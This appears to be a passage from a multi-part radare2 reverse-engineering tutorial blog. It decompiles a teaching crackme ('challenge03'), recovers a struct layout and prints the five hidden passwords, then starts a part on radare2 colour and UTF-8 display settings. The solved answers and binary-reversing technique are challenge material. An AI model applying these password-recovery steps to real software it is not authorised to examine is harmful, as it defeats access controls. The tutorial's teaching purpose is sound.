0x00601060  0x0000000000400b08  0x0000000000400b10   ..@.......@.....
0x00601070  0x0000000000400b18  0x0000000000400b20   ..@..... .@.....
0x00601080  0x0000000000400b28  0x0000000000000000   (.@.............
0x00601090  0x4e4728203a434347  0x312e312e36202955   GCC: (GNU) 6.1.1
0x006010a0  0x3038303631303220  0x0000000000000032    20160802.......
0x006010b0  0x0000000000000000  0x0000000000000000   ................
0x006010c0  0x0000000000000000  0x0001000300000000   ................
0x006010d0  0x0000000000400238  0x0000000000000000   8.@.............
0x006010e0  0x0002000300000000  0x0000000000400254   ........T.@.....
0x006010f0  0x0000000000000000  0x0003000300000000   ................
0x00601100  0x0000000000400274  0x0000000000000000   t.@.............
0x00601110  0x0004000300000000  0x0000000000400298   ..........@.....
0x00601120  0x0000000000000000  0x0005000300000000   ................
0x00601130  0x0000000000400308  0x0000000000000000   ..@.............
0x00601140  0x0006000300000000  0x0000000000400548   ........H.@.....
0x00601150  0x0000000000000000  0x0007000300000000   ................

This looks far better… As we see, radare also shows the values in green this time, which is another point into
the address direction. By using pxQ we can advise radare2 to print them one per aline and additional give some meta infos about them:

0x00601060 0x0000000000400b08 str.shad7Pe
0x00601068 0x0000000000400b10 str.miTho7i
0x00601070 0x0000000000400b18 str.Wa3suac
0x00601078 0x0000000000400b20 str.ohGhah7
0x00601080 0x0000000000400b28 str.Aibah1a
0x00601088 0x0000000000000000 section.
0x00601090 0x4e4728203a434347 
0x00601098 0x312e312e36202955 
0x006010a0 0x3038303631303220 
0x006010a8 0x0000000000000032 section_end..comment+24
0x006010b0 0x0000000000000000 section.
0x006010b8 0x0000000000000000 section.
0x006010c0 0x0000000000000000 section.
0x006010c8 0x0001000300000000 
0x006010d0 0x0000000000400238 section..interp
0x006010d8 0x0000000000000000 section.
0x006010e0 0x0002000300000000 
0x006010e8 0x0000000000400254 section_end..interp
0x006010f0 0x0000000000000000 section.
0x006010f8 0x0003000300000000 
0x00601100 0x0000000000400274 section_end..note.ABI_tag
0x00601108 0x0000000000000000 section.
0x00601110 0x0004000300000000 
0x00601118 0x0000000000400298 section_end..note.gnu.build_id
0x00601120 0x0000000000000000 section.
0x00601128 0x0005000300000000 
0x00601130 0x0000000000400308 section..dynsym
0x00601138 0x0000000000000000 section.
0x00601140 0x0006000300000000 
0x00601148 0x0000000000400548 section_end..dynsym
0x00601150 0x0000000000000000 section.
0x00601158 0x0007000300000000 

If you want to have an even more annotated view, use pxr:

0x00601060  0x0000000000400b08   ..@..... (.rodata) str.shad7Pe R 0x65503764616873 (shad7Pe) --> ascii
0x00601068  0x0000000000400b10   ..@..... (.rodata) str.miTho7i R 0x69376f6854696d (miTho7i) --> ascii
0x00601070  0x0000000000400b18   ..@..... (.rodata) str.Wa3suac R 0x63617573336157 (Wa3suac) --> ascii
0x00601078  0x0000000000400b20    .@..... (.rodata) str.ohGhah7 R 0x3768616847686f (ohGhah7) --> ascii
0x00601080  0x0000000000400b28   (.@..... (.rodata) str.Aibah1a R 0x61316861626941 (Aibah1a) --> ascii
0x00601088  0x0000000000000000   ........ section_end.GNU_STACK
0x00601090  0x4e4728203a434347   GCC: (GN ascii
0x00601098  0x312e312e36202955   U) 6.1.1 ascii
0x006010a0  0x3038303631303220    2016080 ascii
0x006010a8  0x0000000000000032   2....... (.shstrtab) ascii
0x006010b0  0x0000000000000000   ........ section_end.GNU_STACK
0x006010b8  0x0000000000000000   ........ section_end.GNU_STACK
0x006010c0  0x0000000000000000   ........ section_end.GNU_STACK
0x006010c8  0x0001000300000000   ........
0x006010d0  0x0000000000400238   8.@..... (.interp) section.INTERP R 0x6c2f343662696c2f (/lib64/ld-linux-x86-64.so.2) --> ascii
0x006010d8  0x0000000000000000   ........ section_end.GNU_STACK
0x006010e0  0x0002000300000000   ........
0x006010e8  0x0000000000400254   T.@..... (.note.ABI_tag) section.NOTE R 0x1000000004
0x006010f0  0x0000000000000000   ........ section_end.GNU_STACK
0x006010f8  0x0003000300000000   ........
0x00601100  0x0000000000400274   t.@..... (.note.gnu.build_id) section..note.gnu.build_id R 0x1400000004
0x00601108  0x0000000000000000   ........ section_end.GNU_STACK
0x00601110  0x0004000300000000   ........
0x00601118  0x0000000000400298   ..@..... (.gnu.hash) section_end.NOTE R 0x800000003
0x00601120  0x0000000000000000   ........ section_end.GNU_STACK
0x00601128  0x0005000300000000   ........
0x00601130  0x0000000000400308   ..@..... (.dynsym) section..dynsym R 0x0 --> section_end.GNU_STACK
0x00601138  0x0000000000000000   ........ section_end.GNU_STACK
0x00601140  0x0006000300000000   ........
0x00601148  0x0000000000400548   H.@..... (.dynstr) section..dynstr R 0x6f732e6362696c00 --> ascii
0x00601150  0x0000000000000000   ........ section_end.GNU_STACK
0x00601158  0x0007000300000000   ........

So we know that the obj.passwords is an array of string pointers, suffixed with a null pointer. Let’s look again at
the main function. We see that this list is assigned to local variables (local_18h and local_10h), but it seems
that only a pointer to local_120h is passed as an argument to the checkPassword function (the lea rax, [rbp - local_120h] part).

Based on our current information the following stack layout is used:

rbp-0x120: 0000 0000
rbp-0x11c: ???? ????
rbp-0x018: &obj.passwords
rbp-0x010: &obj.passwords

This means that if you have a pointer to the local_120h variable, you’ll be able to read from forwards till the other
two variables. If we look into the checkPassword function, we’ll see that the address in the first argument is used
multiple times (stored in local_18h) and the value 0x110 is added to it. If we make some calculations (?-0x120 + 0x110)
We see that this matches to the local_10h variable of the main function:

-16 0xfffffffffffffff0 01777777777777777777760 17179869184.0G fffff000:0ff0 -16 1111111111111111111111111111111111111111111111111111111111110000 -16.0 -16.000000f -16.000000

(-16 is the same as -0x10 or 0xfffffffffffffff0 for quadwords). Such constructs are high indicators for structures.

radare2 has some rudimentary support for structures (primarily for representing data in memory) and a generic type system.

Based on our current knowledge, the structure should be something like this:

struct Foo {
    int field0;
    char unknown[260];
    char** field108;
    char** field110;

If we place this definition in a header file, we can tell radare2 to parse it with the to command. To view all currently stored structures, you can use the ts command:


By using t Foo you can generate a formatting command for viewing data based on the parsed definitions. As you notice, this produces some errors:

Cannot resolve type 'type.char **'
Cannot resolve type 'type.char **'
pf d[260]z field0 unknown

This is because radare2 currently doesn’t have a definition for the type char **. We can either change the field types to void* or define the missing type. For learning purposes, we’ll define the missing type.

Radare2 uses internally a database named sdb. This is more or less a key value storage with support for namespaces.

All types are defined inside the anal/types namespace. To interact with the database, you can use either the k command (complete database)
or the tk command (type namespace only). To define a new type, we’ll have to make it known to radare2. This is done by assigning the type identifer the string type:

tk char **=type

In the next step we tell radare how this value should be printed:

tk type.char **=p

We’ve used the p format here, which means that this type represents a pointer. (You can see all possible formatting options by using pf??).

This time, the t Foo command succeeds:

pf d[260]zpp field0 unknown field108 field110

Note: If you are interested how radare2 stores the information about this struct, run tk~Foo. The format for the fields is typeoffsetarraysize

As we’ve now the structure defined, we can use it in the main function. To do this, we’ll set the type of the local_120h variable to this new type Foo:

afvt local_120h Foo

(afvt stands for analysis function variables type).

This time, the disassembly has some additional annotations:

            ;-- main:
/ (fcn) sym.main 115
|   sym.main ();
|           ; var int local_138h @ rbp-0x138
|           ; var int local_130h @ rbp-0x130
|           ; var int local_124h @ rbp-0x124
|           ; var Foo local_120h @ rbp-0x120
|           ; UNKNOWN XREF from 0x004004a8 (unk)
|           ; DATA XREF from 0x004007dd (entry0)
|           0x00400a04      55             push rbp
|           0x00400a05      4889e5         mov rbp, rsp
|           0x00400a08      4881ec400100.  sub rsp, 0x140
|           0x00400a0f      89bddcfeffff   mov dword [rbp - local_124h], edi
|           0x00400a15      4889b5d0feff.  mov qword [rbp - local_130h], rsi
|           0x00400a1c      488995c8feff.  mov qword [rbp - local_138h], rdx
|           0x00400a23      b800000000     mov eax, 0
|           0x00400a28      e889feffff     call sym.banner
|           0x00400a2d      c785e0feffff.  mov dword [rbp - local_120h.field0], 0
|           0x00400a37      48c745e86010.  mov qword [rbp - local_120h.field108], obj.passwords
|           0x00400a3f      48c745f06010.  mov qword [rbp - local_120h.field110], obj.passwords
|           0x00400a47      488d85e0feff.  lea rax, [rbp - local_120h.field0]
|           0x00400a4e      4889c7         mov rdi, rax
|           0x00400a51      e815ffffff     call sym.checkPassword
|           0x00400a56      84c0           test al, al
|       ,=< 0x00400a58      740c           je 0x400a66
|       |   0x00400a5a      bfe90b4000     mov edi, str.Password_accepted_ ; "Password accepted!" @ 0x400be9
|       |   0x00400a5f      e81cfdffff     call sym.imp.puts
|      ,==< 0x00400a64      eb0a           jmp 0x400a70
|      |`-> 0x00400a66      bffc0b4000     mov edi, str.Wrong_         ; "Wrong!" @ 0x400bfc
|      |    0x00400a6b      e810fdffff     call sym.imp.puts
|      |    ; JMP XREF from 0x00400a64 (sym.main)
|      `--> 0x00400a70      b800000000     mov eax, 0
|           0x00400a75      c9             leave
\           0x00400a76      c3             ret

If your output is different from the one above (e.g. missing local_120h.field110), make sure that the offsets were correctly calculated in the database. You can change every entry with the tk command, e.g. tk struct.Foo.field110=char **,272,0.

As we can see, the output now nicely aligns with the assignments. An additional try to represent the asm code as C code
would now look like:

int main(int argc, char **argv) {
    struct Foo local_120h;
    local_120h.field0 = 0;
    local_120h.field108 = obj.passwords;
    local_120h.field110 = obj.passwords;
    if(checkPassword(&local_120h)) {
        puts("Password accepted!\n");
    } else {
    return 0;

The next function (checkPassword) is (obviously) also different to the previous ones:

[0x0040096b]> VV @ sym.checkPassword (nodes 7 edges 8 zoom 100%) BB-NORM mouse:canvas-y movements-speed:5
                     |  0x40096b                                     |
                     | (fcn) sym.checkPassword 153                   |
                     |   sym.checkPassword ();                       |
                     | ; var int local_18h @ rbp-0x18                |
                     | ; var int local_4h @ rbp-0x4                  |
                     | push rbp                                      |
                     | mov rbp, rsp                                  |
                     | sub rsp, 0x20                                 |
                     | mov qword [rbp - local_18h], rdi              |
                     | mov rax, qword [rbp - local_18h]              |
                     | mov rdx, qword [rax + section_end..shstrtab]  |
                     | mov rax, qword [rbp - local_18h]              |
                     | mov qword [rax + 0x110], rdx                  |
                     | jmp 0x4009ea ;[a]                             |
                           |  0x4009ea      |                 |
                           | mov rax, qword [rbp - local_18h] |
                           | mov rax, qword [rax + 0x110]     |
                           | mov rax, qword [rax]             |
                           | test rax, rax  |                 |
                           | jne 0x40098f ;[b]                |
                                 t f        |
        .------------------------' '--------|----------------------.
        |                                   |                      |
        |                                   |                      |
  =-----------------------------------=     |              =--------------------=
  |  0x40098f                         |     |              |  0x4009fd          |
  | mov rax, qword [rbp - local_18h]  |     |              | mov eax, 1         |
  | mov rdi, rax                      |     |              =--------------------=
  | call sym.readPassword ;[c]        |     |                  v
  | mov dword [rbp - local_4h], eax   |     |                  |
  | mov eax, dword [rbp - local_4h]   |     |                  |
  | movsxd rdx, eax                   |     |                  |
  | mov rax, qword [rbp - local_18h]  |     |                  |
  | mov rax, qword [rax + 0x110]      |     |                  |
  | mov rax, qword [rax]              |     |                  |
  | mov rcx, qword [rbp - local_18h]  |     |                  |
  | add rcx, 4                        |     |                  |
  | mov rsi, rax                      |     |                  '------.
  | mov rdi, rcx                      |     |                         |
  | call sym.imp.strncmp ;[d]         |     |                         |
  | test eax, eax                     |     |                         |
  | je 0x4009d0 ;[e]                  |     |                         |
  =-----------------------------------=     |                         |
          f t                               |                         |
        .-' '---------------------.         |                         |
        |                         |         |                         |
        |                         |         |                         |
=--------------------=      =-----------------------------------=     |
|  0x4009c9          |      |  0x4009d0     |                   |     |
| mov eax, 0         |      | mov rax, qword [rbp - local_18h]  |     |
| jmp 0x400a02 ;[f]  |      | mov rax, qword [rax + 0x110]      |     |
=--------------------=      | lea rdx, [rax + 8]                |     |
    v                       | mov rax, qword [rbp - local_18h]  |     |
    |                       | mov qword [rax + 0x110], rdx      |     |
    |                       =-----------------------------------=     |
    '----------------------------.----------'                         |
                             |  0x400a02          |
                             | leave              |
                             | ret                |

First of all, the pointer to the previously used structure is stored in the local variable local_18h. We’ll rename it
to a more meaningful name (afvn local_18h passwordStruct). Let’s also look into the function block by block (e.g. using the minimap mode of VV (remember from the last post?)).

    ; UNKNOWN XREF from 0x00400508 (unk)
    ; CALL XREF from 0x00400a51 (sym.main)
    0x0040096b      55             push rbp
    0x0040096c      4889e5         mov rbp, rsp
    0x0040096f      4883ec20       sub rsp, 0x20
    0x00400973      48897de8       mov qword [rbp - passwordStruct], rdi
    0x00400977      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x0040097b      488b90080100.  mov rdx, qword [rax + section_end..shstrtab] ; [0x108:8]=0x288 LEA section_end..shstrtab ; section_end..shstrtab
    0x00400982      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x00400986      488990100100.  mov qword [rax + 0x110], rdx
    0x0040098d      eb5b           jmp 0x4009ea

This block does only two things. First, it reserves space on the stack (0x20 or 32 bytes). Second, it stores some values based on the input struct. The input pointer goes to our local variable at 0x400973, this address is afterwards stored into rax to access it’s members (typical for structures). In 0x40097b the field a offset 0x108 is accessed (radare2 was a bit to eager when it tried to replace constants with flags). This means it reads the value of our field108 variable. The value is then stored into a field at offset 0x110(field110). Sadly, the inline annotation of structure offsets is currently not implemented in radare2 (but is already planned for future releases).

int checkPassword(struct Foo *input) {
    // 0x00400973
    struct Foo* passwordStruct = input;
    // 0x00400977 - 0x00400986
    passwordStruct->field110 = passwordStruct->field108;

The following uncondtional jump brings us to the following small block:

    ; JMP XREF from 0x0040098d (sym.checkPassword)
    0x004009ea      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x004009ee      488b80100100.  mov rax, qword [rax + 0x110]        ; [0x110:8]=0x290
    0x004009f5      488b00         mov rax, qword [rax]
    0x004009f8      4885c0         test rax, rax
    0x004009fb      7592           jne 0x40098f

This block simply checks if the pointer in field110 points to a valid pointer itself.

// 0x004009ea - 0x004009fb
if (*passwordStruct->field110) {

If the pointer is valid, it will jump to the largest block of this function:

    0x0040098f      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x00400993      4889c7         mov rdi, rax
    0x00400996      e854ffffff     call sym.readPassword
    0x0040099b      8945fc         mov dword [rbp - local_4h], eax
    0x0040099e      8b45fc         mov eax, dword [rbp - local_4h]
    0x004009a1      4863d0         movsxd rdx, eax
    0x004009a4      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x004009a8      488b80100100.  mov rax, qword [rax + 0x110]        ; [0x110:8]=0x290
    0x004009af      488b00         mov rax, qword [rax]
    0x004009b2      488b4de8       mov rcx, qword [rbp - passwordStruct]
    0x004009b6      4883c104       add rcx, 4
    0x004009ba      4889c6         mov rsi, rax
    0x004009bd      4889cf         mov rdi, rcx
    0x004009c0      e8abfdffff     call sym.imp.strncmp
    0x004009c5      85c0           test eax, eax
    0x004009c7      7407           je 0x4009d0

This block uses the pointer to the structure as an argument for the function readPassword. The result of this function (eax) is then stored into a local variable local_4h. This value is afterwards used for the following strncmp call (third argument, rdx). The first argument of this call is our current unknown field (offset 4) of the structure, the second argument is where field110 points at.

A pseudo representation might look like the following:

// 0x0040098f - 0x0040099b
int x = readPassword(passwordStruct);
// 0x0040099e - 0x004009c7
if (!strncmp(passwordStruct->unknown, *passwordStruct->field110, x)) {

If the inputs are equal, the following block will be exectued

    0x004009d0      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x004009d4      488b80100100.  mov rax, qword [rax + 0x110]        ; [0x110:8]=0x290
    0x004009db      488d5008       lea rdx, [rax + 8]                  ; 0x8
    0x004009df      488b45e8       mov rax, qword [rbp - passwordStruct]
    0x004009e3      488990100100.  mov qword [rax + 0x110], rdx

This is again a smaller one, which takes the value in field110, increments it by 8 (one pointer size on 64bit systems) and stores it.

// 0x004009d0 - 0x004009e3
// passwordStruct->field110 = ((char*)passwordStruct->field110) + 8;

As this starts now starts over at 0x004009ea we’ll continue with the non matching case of the strings.

    0x004009c9      b800000000     mov eax, 0
    0x004009ce      eb32           jmp 0x400a02

This is simple, it just sets eax to zero and jumps to the end of the function

} else {
    // 0x004009c9 & 0x00400a02
    return 0;

The last block(s) represent the success case of the function

    0x004009fd      b801000000     mov eax, 1
    ; JMP XREF from 0x004009ce (sym.checkPassword)
    0x00400a02      c9             leave
    0x00400a03      c3             ret
    // 0x004009fd - 0x00400a03
    return 1;

With some refactoring based on an overall look (jumping back to the zero check for example) we can represent the function as the following:

int checkPassword(struct Foo *input) {
    // 0x00400973
    struct Foo* passwordStruct = input;
    // 0x00400977 - 0x00400986
    passwordStruct->field110 = passwordStruct->field108;
    // 0x004009ea - 0x004009fb
    while (*passwordStruct.field110) {
        // 0x0040098f - 0x0040099b
        int x = readPassword(passwordStruct);
        // 0x0040099e - 0x004009c7
        if (!strncmp(passwordStruct->unknown, *passwordStruct->field110, x)) {
            // 0x004009d0 - 0x004009e3
            // passwordStruct->field110 = ((char*)passwordStruct->field110) + 8;
        } else {
            // 0x004009c9 & 0x00400a02
            return 0;
    // 0x004009fd - 0x00400a03
    return 1;

As it seems, there is still one additional function missing (readPassword).

/ (fcn) sym.readPassword 124
|   sym.readPassword ();
|           ; var int local_8h @ rbp-0x8
|           ; CALL XREF from 0x00400996 (sym.checkPassword)
|           0x004008ef      55             push rbp
|           0x004008f0      4889e5         mov rbp, rsp
|           0x004008f3      4883ec10       sub rsp, 0x10
|           0x004008f7      48897df8       mov qword [rbp - local_8h], rdi
|           0x004008fb      488b45f8       mov rax, qword [rbp - local_8h]
|           0x004008ff      488b80100100.  mov rax, qword [rax + 0x110] ; [0x110:8]=0x290
|           0x00400906      4889c2         mov rdx, rax
|           0x00400909      488b45f8       mov rax, qword [rbp - local_8h]
|           0x0040090d      488b80080100.  mov rax, qword [rax + section_end..shstrtab] ; [0x108:8]=0x288 LEA section_end..shstrtab ; section_end..shstrtab
|           0x00400914      4829c2         sub rdx, rax
|           0x00400917      4889d0         mov rax, rdx
|           0x0040091a      48c1f803       sar rax, 3
|           0x0040091e      4883c001       add rax, 1
|           0x00400922      4889c6         mov rsi, rax
|           0x00400925      bfcb0b4000     mov edi, str.Enter_Password_no.__d: ; "Enter Password no. %d: " @ 0x400bcb
|           0x0040092a      b800000000     mov eax, 0
|           0x0040092f      e86cfeffff     call sym.imp.printf
|           0x00400934      488b45f8       mov rax, qword [rbp - local_8h]
|           0x00400938      4883c004       add rax, 4
|           0x0040093c      4889c6         mov rsi, rax
|           0x0040093f      bfe30b4000     mov edi, str._255s          ; "%255s" @ 0x400be3
|           0x00400944      b800000000     mov eax, 0
|           0x00400949      e862feffff     call sym.imp.__isoc99_scanf
|           0x0040094e      488b45f8       mov rax, qword [rbp - local_8h]
|           0x00400952      c68003010000.  mov byte [rax + 0x103], 0
|           0x00400959      488b45f8       mov rax, qword [rbp - local_8h]
|           0x0040095d      4883c004       add rax, 4
|           0x00400961      4889c7         mov rdi, rax
|           0x00400964      e827feffff     call sym.imp.strlen
|           0x00400969      c9             leave
\           0x0040096a      c3             ret

This function has no jumps or internal function calls. The summary view (pdfs) shows which flags and calls are used
by the function:

0x00400925 "Enter Password no. %d: "
0x0040092f call sym.imp.printf
0x0040093f "%255s"
0x00400949 call sym.imp.__isoc99_scanf
0x00400964 call sym.imp.strlen

Simply based on this output we could already guess what this function does:

int readPassword(struct Foo* foo) {
    printf("Enter Password no. %d\n");
    return strlen();

Obviously, this is not enough for us, as we want to know exactly what’s really going on. Let’s start with the part 0x004008ef-0x0040090d:

The first instructions represent again a typical function prologue. They reserve 0x10 bytes on the stack and store the input pointer into this buffer (local_8h). Afterwards, field110 is stored in rdx and field108 in rax.

int readPassword(struct Foo* foo) {
    // 0x004008ef-0x0040090d
    struct Foo* local_8h = foo;
    rdx = local_8h->field110;
    rax = local_8h->field108;

Part 0x00400914-0x0040091e consists of some mathematical instructions which can be translated into the following code snippet:

rax = rdx - rax
rax >>= 3
rax += 1

As we know, the rdx and rax registers contain pointers to a list of strings. We also know (based on the checkPassword function) that field110 is incremented during the processing, whilst field108 stays the same. This ultimatively means that rdx - rax describes the offset between the two list entries on which field110 and field108 are pointing at. The next instruction (rax >>= 3) dos a right shift of the value in rax(our offset) by three positions. A right shift by one is equivalent to a division by two, therefore we have a
division by eight here. As we are dealing with 64bit pointers, these two instructions simply calculate how many times the field110 pointer was moved forward. The last increment just increments them by one, as (based on the following string) the current (one based) position should be printed out.

Together with the instructions 0x00400922-0x0040092f we get:

int readPassword(struct Foo* foo) {
    // 0x004008ef-0x0040092f
    struct Foo* local_8h = foo;
    printf("Enter Password no. %d\n", (local_8h->field110 - local_8h-field108) + 1);

Part 0x00400934-0x00400952 represents a scanf call with the unknown field of the struct (offset 4) followed by an explicit zero byte at the end:

// 0x00400934-0x00400952
scanf("%255s", local_8h->unknown);
local_8h->unknown[0x103] = 0;

The end of the function simply returns the result of a strlen call with the input read by scanf.

int readPassword(struct Foo* foo) {
    // 0x004008ef-0x0040092f
    struct Foo* local_8h = foo;
    printf("Enter Password no. %d\n", (local_8h->field110 - local_8h-field108) + 1);
    // 0x00400934-0x00400952
    scanf("%255s", local_8h->unknown);
    local_8h->unknown[259] = 0;
    // 0x00400959 - 0x0040096a
    return strlen(local_8h->unknown);

As we have now reversed all functions, we can see that this time multiple passwords are required and that they are stored in an array at obj.passwords. We’ve also reversed the format of the structure and (just for reference) can now rename the corresponding fields. This could be either done by editing the
header file, editing the database entries directly (tk) or by overwriting the definition inline

"td struct Foo {int field0; char password[260]; char** passwordListHead; char** currentPasswordListEntry;};"

Note: the quotes around the command are required to ensure that the definition is parsed correctly. Also be aware that the offsets may be incorrectly parsed.

Let’s test the passwords:

$ ./challenge03
#          Challenge 3           #
#                                #
#      (c) 2016 Timo Schmid      #
Enter Password no. 1: shad7Pe
Enter Password no. 2: miTho7i
Enter Password no. 3: Wa3suac
Enter Password no. 4: ohGhah7
Enter Password no. 5: Aibah1a
Password accepted!

Challenge 0x04

You will find the next challenge here (linux64 dynamically linked, linux64 statically linked, win64):


MD5 (challenge04) = 215a8fa0a80c95082f8fb279ad7e5b9b
MD5 (challenge04.exe) = 016b96d38e914a96dca372b30d6d0949
MD5 (challenge04-static) = 87e67337a34fa8892bc2fc3c68c4db7d

SHA1 (challenge04) = 95a042b68c036c1d6b6698820589480be29a1437
SHA1 (challenge04.exe) = e4351d511c05666984c43d24cd4c338b3d715a66
SHA1 (challenge04-static) = 64d1ce0ae9a653860953faa87f88377fc0eda34b

SHA256 (challenge04) = 2829ef89135f9065c8b1122a13cde09df5d19768e25feb162a758ab168e1bfb4
SHA256 (challenge04.exe) = d63aa0768ba64eb5211a4f86c07b4b45b17e6125b79b24620f854c70aab401de
SHA256 (challenge04-static) = f723e4f44657484945501bf5ccdab2e7dd229db719f3568ad3cd88da382dccf9

The goal is again to find the correct password for the login into the binary. Next time, I’ll give you a walkthrough for the fourth challenge and challenge #5.

Happy reversing!

Reverse Engineering With Radare2 – Part 2

Welcome back to the radare2 reversing tutorials. If you’ve missed the previous parts, you can find them here and here.

Last time we’ve used the rabin2 application to view the  strings found inside the challenge01 binary to find password candidates. Based on the results we looked into the assembly to find the correct password. In this post, we’ll go through the next challenge and try out some of the features provided by radare2.

As recommended by the developers, I strongly suggest that you update your radare2 installation regularly, as it gets new features and bugfixes nearly every day.

Today, we’ll have a look into some of the visualization features of radare2.

First of all, you may have been noticed that the radare2 output is rather colorful. If the current colorscheme does not fit your needs, you’ll have multiple options to modify it. Several configuration parameters exist under the scr configuration space. You can view the different settings by using e?scr:

          scr.atport: V@ starts a background http server and spawns an r2 -C
           scr.color: Enable colors
     scr.color.bytes: Colorize bytes that represent the opcodes of the instruction
       scr.color.ops: Colorize numbers and registers in opcodes
         scr.columns: Force console column count (width)
            scr.echo: Show rcons output in realtime to stderr and buffer
        scr.feedback: Set visual feedback level (1=arrow on jump, 2=every key (useful for videos))
           scr.fgets: Use fgets() instead of dietline for prompt input
     scr.fix_columns: Workaround for Prompt iOS SSH client
        scr.fix_rows: Workaround for Linux TTY
             scr.fps: Show FPS in Visual
       scr.highlight: Highlight that word at RCons level
        scr.histsave: Always save history on exit
            scr.html: Disassembly uses HTML syntax
     scr.interactive: Start in interactive mode
            scr.nkey: Select the seek mode in visual
            scr.null: Show no output
           scr.pager: Select pager program (when output overflows the window)
       scr.pipecolor: Enable colors when using pipes
          scr.prompt: Show user prompt (used by r2 -q)
      scr.promptfile: Show user prompt file (used by r2 -q)
      scr.promptflag: Show flag name in the prompt
      scr.promptsect: Show section name in the prompt
         scr.randpal: Random color palete or just get the next one from 'eco'
      scr.responsive: Auto-adjust Visual depending on screen (e.g. unset asm.bytes)
        scr.rgbcolor: Use RGB colors (not available on Windows)
            scr.rows: Force console row count (height) (duplicate?)
            scr.seek: Seek to the specified address on startup
             scr.tee: Pipe output to file of this name
       scr.truecolor: Manage color palette (0: ansi 16, 1: 256, 2: 16M)
            scr.utf8: Show UTF-8 characters instead of ANSI
           scr.wheel: Mouse wheel in Visual; temporaryly disable/reenable by right click/Enter)
       scr.wheelnkey: Use sn/sp and scr.nkey on wheel instead of scroll
      scr.wheelspeed: Mouse wheel speed

For example if you have a terminal supporting utf8 characters, you might want to enable scr.utf8:


            ;-- main:
/ (fcn) sym.main 133
|           ; var int local_118h @ rbp-0x118
|           ; var int local_110h @ rbp-0x110
|           ; var int local_104h @ rbp-0x104
|           ; var int local_100h @ rbp-0x100
|           ; var int local_1h @ rbp-0x1
|           ; UNKNOWN XREF from 0x00400470 (unk)
|           ; DATA XREF from 0x0040073d (entry0)
|           0x004008e3      55             push rbp
|           0x004008e4      4889e5         mov rbp, rsp
|           0x004008e7      4881ec200100.  sub rsp, 0x120
|           0x004008ee      89bdfcfeffff   mov dword [rbp - local_104h], edi
|           0x004008f4      4889b5f0feff.  mov qword [rbp - local_110h], rsi
|           0x004008fb      488995e8feff.  mov qword [rbp - local_118h], rdx
|           0x00400902      b800000000     mov eax, 0
|           0x00400907      e80affffff     call sym.banner
|           0x0040090c      bf9d0a4000     mov edi, str.Enter_Password: ; "Enter Password: " @ 0x400a9d
|           0x00400911      b800000000     mov eax, 0
|           0x00400916      e8e5fdffff     call sym.imp.printf
|           0x0040091b      488d8500ffff.  lea rax, [rbp - local_100h]
|           0x00400922      4889c6         mov rsi, rax
|           0x00400925      bfae0a4000     mov edi, str._255s          ; "%255s" @ 0x400aae
|           0x0040092a      b800000000     mov eax, 0
|           0x0040092f      e8dcfdffff     call sym.imp.__isoc99_scanf
|           0x00400934      c645ff00       mov byte [rbp - local_1h], 0
|           0x00400938      488d8500ffff.  lea rax, [rbp - local_100h]
|           0x0040093f      4889c7         mov rdi, rax
|           0x00400942      e808ffffff     call sym.checkPassword
|           0x00400947      84c0           test al, al
|       ,=< 0x00400949      740c           je 0x400957
|       |   0x0040094b      bfb40a4000     mov edi, str.Password_accepted_ ; "Password accepted!" @ 0x400ab4
|       |   0x00400950      e88bfdffff     call sym.imp.puts
|      ,==< 0x00400955      eb0a           jmp 0x400961
|      |`-> 0x00400957      bfc70a4000     mov edi, str.Wrong_         ; "Wrong!" @ 0x400ac7
|      |    0x0040095c      e87ffdffff     call sym.imp.puts
|      |    ; JMP XREF from 0x00400955 (sym.main)
|      `--> 0x00400961      b800000000     mov eax, 0
|           0x00400966      c9             leave
\           0x00400967      c3             ret


After e scr.utf8=true:

            ;-- main:
╒ (fcn) sym.main 133
│           ; var int local_118h @ rbp-0x118
│           ; var int local_110h @ rbp-0x110
│           ; var int local_104h @ rbp-0x104
│           ; var int local_100h @ rbp-0x100
│           ; var int local_1h @ rbp-0x1
│           ; UNKNOWN XREF from 0x00400470 (unk)
│           ; DATA XREF from 0x0040073d (entry0)
│           0x004008e3      55             push rbp
│           0x004008e4      4889e5         mov rbp, rsp
│           0x004008e7      4881ec200100.  sub rsp, 0x120
│           0x004008ee      89bdfcfeffff   mov dword [rbp - local_104h], edi
│           0x004008f4      4889b5f0feff.  mov qword [rbp - local_110h], rsi
│           0x004008fb      488995e8feff.  mov qword [rbp - local_118h], rdx
│           0x00400902      b800000000     mov eax, 0
│           0x00400907      e80affffff     call sym.banner
│           0x0040090c      bf9d0a4000     mov edi, str.Enter_Password: ; "Enter Password: " @ 0x400a9d
│           0x00400911      b800000000     mov eax, 0
│           0x00400916      e8e5fdffff     call sym.imp.printf
│           0x0040091b      488d8500ffff.  lea rax, [rbp - local_100h]
│           0x00400922      4889c6         mov rsi, rax
│           0x00400925      bfae0a4000     mov edi, str._255s          ; "%255s" @ 0x400aae
│           0x0040092a      b800000000     mov eax, 0
│           0x0040092f      e8dcfdffff     call sym.imp.__isoc99_scanf
│           0x00400934      c645ff00       mov byte [rbp - local_1h], 0
│           0x00400938      488d8500ffff.  lea rax, [rbp - local_100h]
│           0x0040093f      4889c7         mov rdi, rax
│           0x00400942      e808ffffff     call sym.checkPassword
│           0x00400947      84c0           test al, al
│       ┌─< 0x00400949      740c           je 0x400957
│       │   0x0040094b      bfb40a4000     mov edi, str.Password_accepted_ ; "Password accepted!" @ 0x400ab4
│       │   0x00400950      e88bfdffff     call sym.imp.puts
│      ┌──< 0x00400955      eb0a           jmp 0x400961
│      │└─> 0x00400957      bfc70a4000     mov edi, str.Wrong_         ; "Wrong!" @ 0x400ac7
│      │    0x0040095c      e87ffdffff     call sym.imp.puts
│      │    ; JMP XREF from 0x00400955 (sym.main)
│      └──> 0x00400961      b800000000     mov eax, 0
│           0x00400966      c9             leave
╘           0x00400967      c3             ret


Currently, it mainly affects the drawn ascii arrows on the left hand side of the disassemblies. Of course you can also disable the coloring entirely by executing e scr.color = false (entirely), e scr.color.bytes = false (only the bytes in the disassembly) or e scr.color.ops = false (only the opcodes). If you like colors, but not the current scheme, you can choose another one by using the eccommands. One option is to choose one of the predefined themes, for example eco solarized:

            ;-- main:
╒ (fcn) sym.main 133
│           ; var int local_118h @ rbp-0x118
│           ; var int local_110h @ rbp-0x110
